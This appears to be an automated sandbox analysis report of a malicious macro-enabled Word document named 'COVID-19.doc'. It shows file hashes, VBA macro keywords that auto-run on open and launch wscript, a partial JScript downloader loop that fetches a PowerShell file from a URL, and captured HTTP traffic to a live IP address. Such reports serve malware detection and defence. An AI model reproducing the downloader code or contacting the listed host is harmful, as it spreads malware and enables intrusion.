        SHA1:6c338a10e894bcad8c67e5da332a6cd7f75f35e0
        SHA256:9d063fd60d7d0fb2d4d92f0f348bb2397cf80dd8a4fec5680647469b570f2afe
        SHA512:bb447e4fc15c4b6186e6a7ad913b695a70e4392bb6e7ee5467831dd2b34db3a7256f927b54be555e148f5906fc41cf0c6fd887f86387cb29aacb6d568563c933
        SSDEEP:6144:b4pXcA1eWEqP9w1n+DtGMYkvfFvOnOIl7eYoOcS/fj3zjNThY0pb:EWWeCYn+rNLIJ6VSHjN7N
        File Content Preview:........................>......................................................................................................................................................................................................................................

        File Icon

        Icon Hash:e4eea2aaa4b4b4a4

        Static OLE Info

        General

        Document Type:OLE
        Number of OLE Files:1

        OLE File "COVID-19.doc"

        Indicators

        Has Summary Info:True
        Application Name:Microsoft Office Word
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:True

        Summary

        Code Page:-535
        Title:
        Subject:
        Author:
        Keywords:
        Comments:
        Template:Normal.dotm
        Last Saved By:Windows User
        Revion Number:5
        Total Edit Time:21420
        Create Time:2021-01-18 22:07:00
        Last Saved Time:2021-01-19 18:30:00
        Number of Pages:1
        Number of Words:0
        Number of Characters:2
        Creating Application:Microsoft Office Word
        Security:0

        Document Summary

        Document Code Page:-535
        Number of Lines:1
        Number of Paragraphs:1
        Thumbnail Scaling Desired:False
        Company:
        Contains Dirty Links:False
        Shared Document:False
        Changed Hyperlinks:False
        Application Version:786432

        Streams with VBA

        VBA File Name: ThisDocument.cls, Stream Size: 2850
        General
        Stream Path:Macros/VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:2850
        Data ASCII:. . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . u Q R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . x . C . . . . . U h . . . . . . . . I . + . . W . . . . . . . . . . . . . . . . . . . . . . . ^ . . 0 R . . @ . . u . . . 6 p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 01 00 01 00 00 d6 05 00 00 e4 00 00 00 62 02 00 00 a0 07 00 00 dd 05 00 00 d9 08 00 00 00 00 00 00 01 00 00 00 75 51 52 d1 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 a4 04 6b 09 d4 78 ae 43 b0 e0 a9 ec 05 55 68 e2 14 d5 f5 1e c5 fd fa 49 83 2b 11 06 57 fb b9 d6 00 00 00 00 00 00 00 00 00 00 00 00 00

        VBA Code Keywords

        Keyword
        Dir("x:\",
        VB_Name
        VB_Creatable
        VB_Exposed
        ActiveDocument.Path
        Print
        Until
        Replace(f,
        Replace(s,
        "\\"))
        "wscript
        DateAdd("s",
        VB_Customizable
        /e:jscript
        ".tmp"
        DoEvents
        ".doc",
        Document_Open()
        Output
        VB_TemplateDerived
        "ThisDocument"
        "%%U%%",
        False
        Attribute
        Replace(ActiveDocument.Name,
        Shell
        VB_PredeclaredId
        VB_GlobalNameSpace
        VB_Base
        Close
        "%%PS%%",
        VBA Code
        VBA File Name: UserForm1.frm, Stream Size: 1618
        General
        Stream Path:Macros/VBA/UserForm1
        VBA File Name:UserForm1.frm
        Stream Size:1618
        Data ASCII:. . . . . . . . . h . . . . . . . . . . . . . . . o . . . 7 . . . . . . . . . . . u Q z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] r U . . 0 J . . . . ; d S / . K . . f . ; G . . . . > . . . . . . . . . / I . g . . , U . . . . . . . . I . . G O E . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 00 00 01 00 00 68 04 00 00 e4 00 00 00 84 02 00 00 96 04 00 00 6f 04 00 00 37 05 00 00 02 00 00 00 01 00 00 00 75 51 7a 10 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 95 5d 72 55 2e 07 30 4a 89 ef 94 f9 3b 64 53 2f 8a 4b db ec 66 09 3b 47 80 f1 e1 af 3e 90 f3 1a 12 95 ca 01 04 a0 2f 49 8d 67 d5 1b 2c

        VBA Code Keywords

        Keyword
        False
        Private
        VB_Exposed
        Attribute
        VB_Name
        VB_Creatable
        VB_PredeclaredId
        VB_GlobalNameSpace
        VB_Base
        VB_Customizable
        VB_TemplateDerived
        UserForm_Click()
        VBA Code

        Streams

        Stream Path: \x1CompObj, File Type: data, Stream Size: 160
        General
        Stream Path:\x1CompObj
        File Type:data
        Stream Size:160
        Entropy:3.99059075143
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q N . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . O . f . f . i . c . e . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 4e 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 4f 00 66 00 66 00 69 00 63 00 65 00 20 00 57 00
        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5DocumentSummaryInformation
        File Type:data
        Stream Size:4096
        Entropy:0.303808718283
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 10 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5SummaryInformation
        File Type:data
        Stream Size:4096
        Entropy:0.555003203852
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 8c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 d8 00 00 00 06 00 00 00 e4 00 00 00 07 00 00 00 f0 00 00 00 08 00 00 00 04 01 00 00 09 00 00 00 1c 01 00 00
        Stream Path: 1Table, File Type: data, Stream Size: 6841
        General
        Stream Path:1Table
        File Type:data
        Stream Size:6841
        Entropy:6.09008436485
        Base64 Encoded:True
        Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
        Data Raw:6a 04 0f 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
        Stream Path: Data, File Type: data, Stream Size: 371167
        General
        Stream Path:Data
        File Type:data
        Stream Size:371167
        Entropy:7.61641986305
        Base64 Encoded:True
        Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . J 8 # & r . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . . . . . . . . . . . . . . . . . . . C . . . B . . . . A . . . . . . * . . . . . . . . . . . . . . . > . H . 8 . 1 . : . 0 . . 2 . > . @ . 4 . . = . 0 . . C . : . @ . . 2 . . . . . . . . . . . . . . . R . . . % . . . . . . . . . f . . . . y . s ) . . . . . . . . . . . . . D . . . . . 5 . . F . . . . . . . . . . f . . . . y . s ) . . . . . . . . . ) E x i
        Data Raw:df a9 05 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 38 23 26 72 02 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 66 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 42 00 00 00 04 41 01 00 00 00 05 c1 2a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 3e 04 48 04
        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 484
        General
        Stream Path:Macros/PROJECT
        File Type:ASCII text, with CRLF line terminators
        Stream Size:484
        Entropy:5.38554759732
        Base64 Encoded:True
        Data ASCII:I D = " { 9 B A 0 8 4 6 4 - 8 5 7 B - 4 7 4 4 - 9 0 8 F - D 1 F F F 6 1 F F F A 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D B D 9 D B 5 1 6 7 5 5 6 7 5 5 6 7 5 5 6 7 5 5 " . . D P B = " 6 3 6
        Data Raw:49 44 3d 22 7b 39 42 41 30 38 34 36 34 2d 38 35 37 42 2d 34 37 34 34 2d 39 30 38 46 2d 44 31 46 46 46 36 31 46 46 46 41 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
        General
        Stream Path:Macros/PROJECTwm
        File Type:data
        Stream Size:71
        Entropy:3.29226192431
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
        Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
        Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
        General
        Stream Path:Macros/UserForm1/\x1CompObj
        File Type:data
        Stream Size:97
        Entropy:3.61064918306
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
        General
        Stream Path:Macros/UserForm1/\x3VBFrame
        File Type:ASCII text, with CRLF line terminators
        Stream Size:292
        Entropy:4.57455623175
        Base64 Encoded:True
        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 5 2 0 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 5 0 5 5 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
        Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 94
        General
        Stream Path:Macros/UserForm1/f
        File Type:data
        Stream Size:94
        Entropy:2.71126254613
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . } . . . " . . . # . . . . . . . . . . . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . . . . . . . . L a b e l 1 . . { . . . . . . .
        Data Raw:00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 d4 22 00 00 dd 23 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 1c 02 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 7b 02 00 00 d4 00 00 00
        Stream Path: Macros/UserForm1/o, File Type: data, Stream Size: 540
        General
        Stream Path:Macros/UserForm1/o
        File Type:data
        Stream Size:540
        Entropy:5.18432057045
        Base64 Encoded:False
        Data ASCII:. . . . ( . . . . . . . v a r o = W S c r i p t . C r e a t e O b j e c t ( " M S X M L 2 . X M L H T T P " ) ; . . v a r p s = ' % % P S % % . p s 1 ' . . w h i l e ( t r u e ) { . . o . O p e n ( ' G E T ' , ' % % U % % ' , 0 ) ; . . o . S e n d ( ) ; . . i f ( o . S t a t u s = = 2 0 0 ) { . . v a r s o = n e w A c t i v e X O b j e c t ( ' S c r i p t i n g . F i l e S y s t e m O b j e c t ' ) ; . . v a r f o = s
        Data Raw:00 02 fc 01 28 00 00 00 e9 01 00 80 76 61 72 20 6f 20 3d 20 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 76 61 72 20 70 73 20 3d 20 27 25 25 50 53 25 25 2e 70 73 31 27 0d 0a 77 68 69 6c 65 20 28 74 72 75 65 29 20 7b 0d 0a 20 20 20 20 6f 2e 4f 70 65 6e 28 27 47 45 54 27 2c 27 25 25 55 25 25 27 2c 30 29 3b
        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3258
        General
        Stream Path:Macros/VBA/_VBA_PROJECT
        File Type:data
        Stream Size:3258
        Entropy:4.23605935534
        Base64 Encoded:False
        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
        Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 825
        General
        Stream Path:Macros/VBA/dir
        File Type:data
        Stream Size:825
        Entropy:6.51401324555
        Base64 Encoded:True
        Data ASCII:. 5 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . h . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . . a .
        Data Raw:01 35 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 aa 68 f6 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
        Stream Path: WordDocument, File Type: data, Stream Size: 4096
        General
        Stream Path:WordDocument
        File Type:data
        Stream Size:4096
        Entropy:1.03818034246
        Base64 Encoded:False
        Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 03 08 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 0e 00 00 ce 90 01 00 ce 90 01 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Jan 20, 2021 10:25:07.361107111 CET4916580192.168.2.2278.141.194.181
        Jan 20, 2021 10:25:07.411768913 CET804916578.141.194.181192.168.2.22
        Jan 20, 2021 10:25:07.411868095 CET4916580192.168.2.2278.141.194.181
        Jan 20, 2021 10:25:07.412630081 CET4916580192.168.2.2278.141.194.181
        Jan 20, 2021 10:25:07.462918997 CET804916578.141.194.181192.168.2.22
        Jan 20, 2021 10:25:07.463958979 CET804916578.141.194.181192.168.2.22
        Jan 20, 2021 10:25:07.464065075 CET4916580192.168.2.2278.141.194.181
        Jan 20, 2021 10:25:12.370846987 CET804916578.141.194.181192.168.2.22
        Jan 20, 2021 10:25:12.370985985 CET4916580192.168.2.2278.141.194.181
        Jan 20, 2021 10:25:13.042076111 CET4916580192.168.2.2278.141.194.181

        HTTP Request Dependency Graph

        • 78.141.194.181

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.224916578.141.194.18180C:\Windows\System32\wscript.exe
        TimestampkBytes transferredDirectionData
        Jan 20, 2021 10:25:07.412630081 CET0OUTGET /d569872345345.txt HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 78.141.194.181
        Connection: Keep-Alive
        Jan 20, 2021 10:25:07.463958979 CET1INHTTP/1.1 200 OK
        Date: Wed, 20 Jan 2021 09:25:07 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Fri, 25 Dec 2020 16:29:47 GMT
        ETag: "5a7-5b74c6eccbba7-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 772
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/plain
        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 85 54 6d 6f d3 30 10 fe dc fc 8a 53 55 94 56 c8 d9 ba 96 31 8a f6 61 94 01 95 d8 5a 2d 88 7d 60 08 79 ce b5 31 24 76 b0 9d 6e 15 f4 bf 73 76 32 68 11 2f 91 92 d8 be b7 e7 9e bb 73 c5 0d 2f fb 1f 66 ca 8d 8e 3e f6 78 56 4a 75 25 57 b9 b3 70 0a 87 83 48 2e fb b0 77 ca f0 2b 1c c2 20 fa 16 75 7a dc ac bc 5a cc ce ef 51 d4 4e 6a b5 d0 85 14 1b 78 b1 a9 b8 25 dd 4b fd 56 af b4 ff 2b 0a 80 86 0b 27 d7 e8 f7 0b a3 97 b2 a0 e5 b5 54 99 be 4b dd 86 36 6f 64 96 a1 02 f6 ca 4b ba 31 3c 86 de c5 66 a6 d6 5a 70 ef 3c f9 b5 bc e4 25 92 38 ee 02 db 05 37 8c 09 95 a9 95 c2 8c 70 f5 96 bc b0 18 75 ee 72 f2 d7 07 a6 b4 83 07 e9 20 ea 50 06 9d 77 66 43 5f bf ea a4 8e 1b c7 08 97 40 0f dd 63 58 70 97 43 b7 d2 77 68 6c 8e 45 91 e0 3d 52 c4 33 b3 aa 4b 54 ee ad b4 e4 30 90 f0 c7 34 de a3 b9 85 ab 5a 9d 59 ef 7f 07 97 33 35 c1 ea 6c e9 9d 72 27 f2 16 02 ed b7 d1 16 22 24 d4 f0 2d 02 7a 7a f3 f4 cc 88 5c 3a 14 ae 36 48 c6 fd d7 e8 d8 75 29 e7 b7 9f e9 0c d8 b4 f0 4c 53 f8 d1 d1 a7 79 45 14 3b a9 56 e9 c6 3a 2c e1 3b a4 58 90 16 6b 95 e9 f9 cd 1f 3b 37 46 9b 33 e1 39 85 d4 e9 6a 90 ec 6b 04 14 72 09 fd df 91 b0 f3 af 10 1f 8f d9 ad 74 f1 a0 45 fb f0 f4 aa ca e6 ba f4 70 e3 e9 e4 a6 e1 c6 de 10 aa eb f9 f5 f1 f8 e1 60 e1 89 4d 3d b1 37 eb 61 72 18 07 1f 5b d8 49 ff ff 0e 29 cd d1 d1 bf 1d 46 0d 93 b5 29 c8 bc 9b 3b 57 4d 0e 0e 9e 9e 24 c3 f1 30 19 3e 1b 27 c3 93 e1 81 1d 8d 9f 9d 3c 1d 8f 9e d0 37 71 f7 ae db 1a 65 d6 85 66 3c 85 0f 4d b0 64 36 4f 7c 5b 7c 9c 4c a8 10 57 9c e2 96 5e c3 37 64 7f e0 5b 32 a9 ec b0 89 dc 5b 36 a6 3f d1 93 f4 26 74 75 eb b6 09 32 2b 2b 4d 9d 77 a1 b3 9a d4 5f 48 67 df 19 ae ec 12 4d 10 37 7d b9 7b 0c 2c d5 b5 11 d8 e4 c4 5e a2 a5 9a 87 b1 68 42 b6 d8 2d 9a b5 14 1e 00 c4 56 80 30 c8 1d 82 c8 51 7c a9 ab cc af 6f a5 aa 28 17 62 e5 d1 74 7e 91 2e ce a7 8f e0 60 0a d6 47 84 bd a3 80 7a 37 8d fd a1 80 bf de 00 81 bd 60 1d c8 08 23 1b fc 9f 42 86 05 df 60 c6 78 ed 34 bc 94 b6 a2 ad a7 91 e0 4c 3d 48 58 6a 03 0d 52 db 6d 19 15 a5 1f a0 2e fd 42 58 0f 56 78 47 b8 9f d9 f3 1d 85 07 1e 9e ef 1b 35 49 ee da b4 35 f7 97 cc 17 a4 84 2a 43 17 81 27 95 4d 75 59 52 a5 43 f8 06 47 65 f4 aa 6d 8c 9e 15 46 56 6e 52 ee de 54 17 9b d6 26 34 4b b0 b9 c2 52 af 91 cd fc 60 fe b2 67 af b4 af e4 fe 1c 92 40 b9 82 5c 28 2a 2c 5d 15 d1 36 fa 01 72 ee da 87 a7 05 00 00
        Data Ascii: Tmo0SUV1aZ-}`y1$vnsv2h/s/f>xVJu%WpH.w+ uzZQNjx%KV+'TK6odK1<fZp<%87pur PwfC_@cXpCwhlE=R3KT04ZY35lr'"$-zz\:6Hu)LSyE;V:,;Xk;7F39jkrtEp`M=7ar[I)F);WM$0>'<7qef<Md6O|[|LW^7d[2[6?&tu2++Mw_HgM7}{,^hB-V0Q|o(bt~.`Gz7`#B`x4L=HXjRm.BXVxG5I5*C'MuYRCGemFVnRT&4KR`g@\(*,]6r


        Code Manipulations

        Statistics

        Behavior

        Click to jump to process

        System Behavior

        General

        Start time:10:24:34
        Start date:20/01/2021
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Imagebase:0x13fcc0000
        File size:1424032 bytes
        MD5 hash:95C38D04597050285A18F66039EDB456
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:10:24:38
        Start date:20/01/2021
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
        Imagebase:0xff120000
        File size:168960 bytes
        MD5 hash:045451FA238A75305CC26AC982472367
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.2091537255.000000000049A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000003.2091136338.0000000004350000.00000004.00000040.sdmp, Author: Florian Roth
        Reputation:moderate

        General

        Start time:10:24:42
        Start date:20/01/2021
